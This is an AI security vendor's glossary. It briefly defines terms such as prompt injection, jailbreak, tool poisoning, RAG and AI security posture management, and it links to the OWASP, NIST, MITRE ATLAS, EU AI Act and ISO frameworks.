AI Security Glossary | Penaxtra

Adversarial Scan A scheduled execution of probe templates against an LLM endpoint, agent, or RAG pipeline, scored to produce control-mapped findings. Methodology AI Bill of Materials (AI-BOM) A structured inventory of every AI component shipped with a product: models, embeddings, prompts, training datasets, agents, MCP servers, and tools. Artefact AI Security Posture Management (AI-SPM) Continuous discipline that discovers, assesses, secures, and proves the compliance posture of AI systems including LLM apps, agents, MCP servers, RAG pipelines, and vector databases. DisciplineCategory Append-Only Audit Log A tamper-evident log where no row is ever updated or deleted; the canonical evidence store for regulatory audit trails. Control Confused Deputy A classic security pattern where a privileged process is tricked into using its privilege on behalf of an unauthorised principal; reborn for tool-calling AI agents. AttackOWASP Agentic Embedding A dense numeric vector representation of text, image, or audio produced by an embedding model and used for similarity search and clustering. Component Embedding Inversion A privacy attack that reconstructs the original input text from a stored embedding vector. AttackPrivacy Jailbreak A prompt designed to make an LLM produce output the developer instructions or safety alignment was meant to prevent. Attack LLM Security Posture Management (LLM-SPM) A focused layer within AI-SPM that covers prompt flows, model endpoints, and runtime controls for large language model applications. Discipline MCP Server (Model Context Protocol) A server that exposes tools and resources to AI agents via the Model Context Protocol open standard; the tool surface is the security boundary. ComponentOWASP Agentic Meta-Judge A higher-capability LLM judge that resolves disagreement between primary judges in a multi-judge consensus pipeline. Methodology Prompt Injection An attack that smuggles attacker-controlled instructions into a model prompt to override the developer instructions or extract sensitive data. AttackOWASP LLM01 Retrieval-Augmented Generation (RAG) An LLM pattern where the prompt is augmented with documents retrieved from a vector store at query time; the retriever and the corpus are the new attack surfaces. Pattern Runtime AI Gateway A proxy that sits between the application and the LLM provider, applying DLP, tool allowlisting, rate limiting, and signed policy rules in real time. ControlComponent Sealed-Box Encryption An authenticated public-key encryption construction (X25519 + XSalsa20 + Poly1305) where the sender is anonymous and only the holder of the recipient secret key can decrypt. Cryptography Three-Judge Consensus An adversarial-scan scoring pattern where three independent frontier LLMs grade each finding, and a fourth meta-judge resolves disagreement. Methodology Tool Poisoning An attack where a malicious or compromised MCP tool returns crafted output designed to manipulate the agent calling it. AttackOWASP Agentic Vector Store A database optimised for similarity search over high-dimensional embedding vectors; the canonical storage layer for RAG. Component

Primary sources

Every framework cited links back to its publisher.

Auditors verify our control mapping against the same documents we read. Each item below points to the canonical publication.

OWASP LLM Top 10 2025 edition owasp.org →
OWASP Agentic Top 10 T1-T15 genai.owasp.org →
NIST AI 600-1 Generative AI Profile under the NIST AI RMF nvlpubs.nist.gov (PDF) →
MITRE ATLAS Adversarial ML tactics + techniques atlas.mitre.org →
EU AI Act Regulation (EU) 2024/1689 eur-lex.europa.eu →
ISO/IEC 42001 AI management system iso.org/standard/81230 →

Last reviewed: 2026-05-23

See the platform behind the vocabulary.

The AI-SPM platform that maps every finding to OWASP LLM, OWASP Agentic, NIST AI 600-1, MITRE ATLAS, EU AI Act, and ISO/IEC 42001.

AI-SPM overview →